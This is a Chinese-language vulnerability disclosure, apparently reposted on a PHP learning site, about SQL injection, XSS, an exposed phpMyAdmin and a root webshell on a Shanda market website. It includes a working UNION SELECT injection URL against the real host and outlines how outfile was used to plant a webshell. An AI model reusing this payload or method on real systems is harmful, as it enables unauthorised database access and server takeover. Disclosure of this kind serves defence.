来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] N多问题:1.存在SQL注入点2.存在跨站点3.存在phpmyadmin可以访问4.无错误相应机制,爆路径5.最后拿到root权限的webshell6.居然与盛大主站同一网段7.还有太多问题......1.注入点:http://market.sd...
|
N多问题:
1.存在SQL注入点
2.存在跨站点
3.存在phpmyadmin可以访问
4.无错误相应机制,爆路径
5.最后拿到root权限的webshell
6.居然与盛大主站同一网段
7.还有太多问题......
1.注入点:http://market.sdo.com/snda_market_0.2/detail.php?id=2304%20and%201=2%20union%20select%201,2,user%28%29,4,database%28%29,version%28%29,7,8,@@basedir,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@datadir,29,30--
2.PMA:http://market.sdo.com/phpmyadmin/
1.注入点:
 2.服务器配置:
 3.爆mysql用户:
 配合这个http://market.sdo.com/phpmyadmin/ 知道能干嘛吧
4.爆路径:
  6.爆管理员(不知道哪个是):
   后台入口还真没找到
7.跨站确定没开启magic_quote_gpc,也没对引号过滤、转译
 8.load_file它媳妇outfile输出了1句话,拿到了webshell
 9.居然是root
 10.点到为止了,赶紧修吧,发现和主站在同一个网段
修复方案:
你们比我专业。你们懂的。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
